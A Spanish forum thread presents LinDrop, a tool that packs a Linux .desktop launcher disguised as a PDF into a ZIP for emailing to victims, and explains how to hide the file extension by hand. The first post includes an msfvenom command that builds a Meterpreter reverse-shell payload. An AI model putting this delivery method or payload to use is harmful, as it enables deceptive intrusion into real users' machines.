LinDrop - Ingeniería social para objetivos Linux

  • 5 Respuestas
  • 4611 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado HATI

  • *
  • Moderator
  • Mensajes: 452
  • Actividad:
    6.67%
  • Reputación 13
    • Ver Perfil

LinDrop - Ingeniería social para objetivos Linux

  • en: Noviembre 18, 2016, 07:05:27 pm
LinDrop es un vector de ingeniería social dedicado a objetivos con sistema operativo Linux. Se trata de un script en python que genera ZIP  con un  archivo .desktop malicioso que imita ser un PDF.
Este metodo no es algo nuevo, pero Lindrop destaca por centrar sus objetivos a sistemas Linux, permitiendo enviar archivos zip o tar.gz vía email.



Camuflar archivos .desktop de forma manual:

El método para crear archivos .desktop es bastante antiguo. Guardamos un archivo, escribiendo espacios entre la extensión .pdf y la .desktop. Esto es para ofuscar la extensión actual cuando el archivo se abre con Archive Manager.

Después, editamos nuestro archivo añadiendo algunas líneas para que se parezca más a un archivo pdf:

Edición del fichero Underc0de.pdf.desktop

Para el icóno necesitamos una imágen que esté guardada en el objetivo, ya que si no el archivo se mostraría cómo un ejecutable. Para conseguir esto, añadimos la ruta en la que se encuentra la imágen que gnome asocia a los archivos pdf.

Fichero Underc0de.pdf.desktop editado

De esta manera conseguimos obtener el archivo .desktop camuflado de forma manual y un poco rudimentaria, ahora veremos cómo se hace con LinDrop de manera más avanzada en cuatro sencillos pasos.




Uso de LinDrop:

Uso de Lindrop.

  • 1: introducir el nombre para el archivo “PDF” (.desktop) que estará en el archivo ZIP.
  • 2: introducir el nombre para el archivo ZIP.
  • 3: introducir url para descarga remota del payload. Este se guardará en el directorio /tmp. Para ello podemos utilizar msfvenom:
Citar
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload
       
  • 4: introducir PDF para mostrar al usuario.

Al acabar obtendremos el archivo zip con el supuesto pdf dentro listo para enviar. Cuando la víctima lo abra, se le mostrará, en este caso, el taller de pentesting de Underc0de para no levantar sospechas, mientras que el payload esta siendo ejecutado y obtendremos nuestra sesión de meterpreter.

Resultado en el equipo víctima del ataque.



El código del script aún es algo sucio, pero tenemos la oportunidad de mejorarlo notablemente y añadirle nuevas características. Si alguno se anima, tiene repositorio en GitHub:

You are not allowed to view links. Register or Login



Un saludo, HATI  ;D


Jugar o perder

Desconectado Dr4g0n4Y

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 1
  • El objetivo es lo imposible
    • Ver Perfil
    • Email

Re:LinDrop - Ingeniería social para objetivos Linux

  • en: Noviembre 18, 2016, 10:34:58 pm
Que buena ! recomendaciones ahora que ni con Linux estamos tranquilos? Revisar las cabeceras en hexadecimal del archivo? A lo que entendí en el sistema aparecerá como payload.pdf o payload.pdf .desktop??

Enviado desde mi HTC One mediante Tapatalk


Desconectado HATI

  • *
  • Moderator
  • Mensajes: 452
  • Actividad:
    6.67%
  • Reputación 13
    • Ver Perfil

Re:LinDrop - Ingeniería social para objetivos Linux

  • en: Noviembre 19, 2016, 07:55:37 am
Hola @You are not allowed to view links. Register or Login,


Cita de: dragonay
recomendaciones ahora que ni con Linux estamos tranquilos?
Descargar contenido siempre de fuentes fiables y oficiales, evitar enlaces sospechosos, ejecutar los archivos en máquina virtual o sandbox...

Cita de: dragonay
A lo que entendí en el sistema aparecerá como payload.pdf o payload.pdf .desktop??
Te equivocas, aparecerá un arvhivo .zip que contiene un archivo con el siguiente formáto:

Código: Text
  1. "nombredelarchivo".pdf                             .desktop

En dicho archivo se incluye el payload.


Jugar o perder

Desconectado m4x

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:LinDrop - Ingeniería social para objetivos Linux

  • en: Noviembre 27, 2016, 08:52:18 am
Hola, muchas gracias por compartir.
Lo he probado con una máquina virtual víctima Kali Linux, ya que no tenía otra a mano y funciona perfectamente.
Lo único que no me funciona es que no muestra el icono pdf. He visto la ruta de "Icon" y es correcta.
Ya haré más pruebas en otra máquina Ubuntu.

Desconectado HATI

  • *
  • Moderator
  • Mensajes: 452
  • Actividad:
    6.67%
  • Reputación 13
    • Ver Perfil

Re:LinDrop - Ingeniería social para objetivos Linux

  • en: Noviembre 28, 2016, 05:03:53 pm
Hola @You are not allowed to view links. Register or Login,

Cita de: m4x
Lo único que no me funciona es que no muestra el icono pdf. He visto la ruta de "Icon" y es correcta.
Ya haré más pruebas en otra máquina Ubuntu.

Yo hice la prueba con Kali y funciona perfectamente. Intentalo con otro icono. También puedes probarlo de manera manual, es posible que así te de menos problemas.


Jugar o perder

Desconectado m4x

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:LinDrop - Ingeniería social para objetivos Linux

  • en: Diciembre 03, 2016, 10:43:00 am
You are not allowed to view links. Register or Login
Hola @You are not allowed to view links. Register or Login,

Cita de: m4x
Lo único que no me funciona es que no muestra el icono pdf. He visto la ruta de "Icon" y es correcta.
Ya haré más pruebas en otra máquina Ubuntu.

Yo hice la prueba con Kali y funciona perfectamente. Intentalo con otro icono. También puedes probarlo de manera manual, es posible que así te de menos problemas.

El problema estaba en que al pasar el fichero "pdf   .desktop" desde el equipo atacante hacia la máquina virtual (víctima) mediante el pendrive, éste fichero se quedaba sin permisos de ejecución. El sistema de ficheros del pendrive es fat32 y he leído que no soporta permisos, por lo que al montarlo se queda solo con los permisos que le da el sistema, o con los permisos que le des tu al montarlo.
Me he dado cuenta que si es un fichero con extensión ".exe" si que lo copia con permisos de escritura, supongo que será porque el sistema de ficheros lo creó Microsoft.
De todas formas esta claro que hay mejores formas de pasar un fichero entre anfitrión e invitado, pero me resultaba más cómodo así, ya que a veces no me funciona bien la opción de arrastrar y soltar.
A partir de ahora me fijaré más cuando descargue ficheros ;D.

Saludos

 

Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 4352
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
[Phishing] Página de phishing para Twitter

Iniciado por bernatixer

Respuestas: 8
Vistas: 8279
Último mensaje Enero 07, 2016, 10:23:35 am
por ANTRAX
Un Redirect en Facebook para hacer Phishing a Facebook

Iniciado por Stiuvert

Respuestas: 4
Vistas: 7475
Último mensaje Enero 09, 2014, 11:46:26 pm
por Snifer
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 4267
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 6245
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX